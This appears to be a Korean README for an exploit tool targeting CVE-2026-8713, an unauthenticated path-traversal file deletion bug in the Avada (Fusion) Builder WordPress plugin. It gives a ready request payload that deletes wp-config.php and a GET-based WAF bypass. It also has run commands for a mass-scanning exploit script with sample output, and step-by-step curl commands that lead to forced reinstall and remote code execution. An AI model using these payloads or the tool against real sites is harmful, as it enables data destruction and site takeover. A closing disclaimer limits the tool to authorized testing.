
Pre-auth path traversal을 통한 임의 파일 삭제 취약점 (Avada (Fusion) Builder <= 3.15.3)으로 RCE 발생 (CVSS 9.1)
CVE-2026-8713은 WordPress용 Avada (Fusion) Builder 플러그인/테마에서 발생하는 CVSS 9.1 치명적 취약점입니다. Fusion_Form_DB_Entries 클래스의 maybe_delete_files() 함수가 공격자가 제어하는 양식 항목 값에서 단순 문자열 치환만으로 파일 시스템 경로를 구성하며, realpath() 검증이나 디렉토리 포함 제한 검사를 수행하지 않습니다.
인증되지 않은 공격자는 fusion_form_submit_ajax 핸들러를 통해 경로 순회 페이로드를 제출합니다. Fusion_Form_DB_Privacy 종료 훅이 privacy_expiration_action=delete로 항목을 처리할 때, 대상 파일이 서버에서 삭제됩니다.
| 버전 | 상태 |
|---|---|
| Fusion Builder ≤ 3.15.3 | 취약 |
| Fusion Builder ≥ 3.15.4 | 패치됨 |
| Avada 테마 (전체) | 번들 플러그인이 취약할 수 있음 |
참고: Avada 테마 버전(7.x)은 Fusion Builder 플러그인 버전(3.x)과 다릅니다. 취약점은 플러그인에 있지만, 스캐너는 둘 다 탐지합니다.
fusion-builder/inc/class-fusion-form-db-entries.php에서 maybe_delete_files() 메서드는 포함 검증 없이 문자열 치환을 사용하여 파일 경로를 확인합니다.
$file_path = str_replace($upload['url'], $upload['path'], $value);
// realpath() 검사 없음 — 경로 순회 시퀀스 통과
unlink($file_path);
1. 공격자가 wp_ajax_nopriv_fusion_form_submit_ajax를 통해 Avada 양식 제출
→ 경로 순회: ../../wp-config.php
→ privacy_expiration_action = delete
→ privacy_expiration_interval = 0
2. WordPress 종료 훅이 Fusion_Form_DB_Privacy 실행
→ 저장된 양식 항목 처리
→ 공격자가 제어한 경로에 대해 maybe_delete_files() 호출
→ wp-config.php 삭제
3. WordPress가 설치/설정 모드로 진입
→ 공격자가 사이트를 악성 데이터베이스에 연결
→ 완전한 원격 코드 실행
AJAX 핸들러는 wp_ajax_nopriv_로 등록되어 있어 인증되지 않은 사용자도 접근 가능합니다.
POST /wp-admin/admin-ajax.php
action=fusion_form_submit_ajax
form_id=<id>
privacy_expiration_action=delete
fusion_privacy_expiration_interval=0
fusion_form_field_<name>=../../wp-config.php
많은 호스트가 /wp-admin/admin-ajax.php에 대한 POST를 차단합니다. WordPress는 이 엔드포인트에서 GET을 통한 매개변수도 받아들이므로 간단한 우회가 가능합니다.
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=<id>&privacy_expiration_action=delete&...
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt
# 탐지만 (기본값 — 파일 삭제 안 함)
python cve_2026_8713.py -t target.com
# 대량 탐지
python cve_2026_8713.py -f targets.txt
# 익스플로잇 모드 — wp-config.php 삭제
python cve_2026_8713.py -t target.com --exploit
# 사용자 지정 파일 삭제
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"
-t, --target 단일 대상 (도메인 또는 IP)
-f, --file 대상 목록 (한 줄에 하나)
--exploit 파일 삭제 활성화 (기본값: 탐지만)
--delete PATH 삭제할 사용자 지정 파일 경로 (기본값: wp-config.php)
-o, --output 결과를 파일에 저장
--threads 워커 수 (기본값: 20)
-v, --verbose 상세 출력 표시
$ python cve_2026_8713.py -f targets.txt
CVE-2026-8713 Avada (Fusion) Builder | CVSS 9.1
모드: 탐지 | 대상: 521 | 워커: 20
───────────────────────────────────────────────────────
[익스플로잇] target-vuln.com 1.2s 양식 #3 (AJAX 열림)
[취약] target-waf.com 2.1s 양식 #1 (WAF 차단됨)
[AVADA] target-noform.com 0.5s (양식 없음)
[-] target-noavada.com 0.3s
───────────────────────────────────────────────────────
스캔 완료 | 시간: 45초
───────────────────────────────────────────────────────
대상 : 521
Avada 탐지 : 47
양식 발견 : 12
취약 : 9
$ python cve_2026_8713.py -t target.com --exploit -v
CVE-2026-8713 — Avada Builder 익스플로잇
CVSS 9.1 | 인증 없음 | 경로 탐색 → 파일 삭제 → RCE
[+] Avada 양식 발견: id=3
[+] POST form_id=3: HTTP 403 (WAF 차단됨)
[+] GET form_id=3: HTTP 200 (WAF 우회됨)
호스트 : target.com
Avada : 예
양식 : 3
삭제됨 : wp-config.php (강제 재설치 → RCE)
시간 : 3.2초
1단계 — Avada 확인
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5
2단계 — 양식 ID 찾기
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](https://github.com/shinthink/cve-2026-8713/blob/main/%5Cd%2B)'
3단계 — 경로 순회로 양식 제출
curl -sk -X POST \
-d 'action=fusion_form_submit_ajax' \
-d 'form_id=3' \
-d 'privacy_expiration_action=delete' \
-d 'fusion_privacy_expiration_interval=0' \
-d 'fusion_form_field_x=../../wp-config.php' \
'https://target.com/wp-admin/admin-ajax.php'
4단계 — WAF 우회 (POST 차단 시)
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'
5단계 — RCE 확인 및 익스플로잇
# 사이트가 설치 모드인가?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 → wp-config 삭제됨 → 악성 DB 연결 → 완전한 RCE
교육 및 승인된 테스트 목적으로만 사용하십시오.
이 소프트웨어는 승인된 침투 테스트를 수행하는 보안 전문가, 자체 인프라를 감사하는 조직, 취약점 악용을 연구하는 연구자를 대상으로 합니다.
컴퓨터 시스템에 대한 무단 접근은 불법이며 다음을 위반할 수 있습니다:
- 미국: Computer Fraud and Abuse Act (18 U.S.C. 1030)
- 인도네시아: UU ITE Pasal 30 & 46
- 유럽 연합: Directive 2013/40/EU
- 영국: Computer Misuse Act 1990
저자는 오용에 대해 어떠한 책임도 지지 않습니다.
| 자료 | 링크 |
|---|---|
| IONIX Advisory | ionix.io/threat-center/cve-2026-8713 |
| Wordfence Advisory | wordfence.com |
| Patchstack | patchstack.com |
| NVD Entry | CVE-2026-8713 |
이 프로젝트는 ThemeFusion 또는 Avada와 제휴 관계가 아닙니다.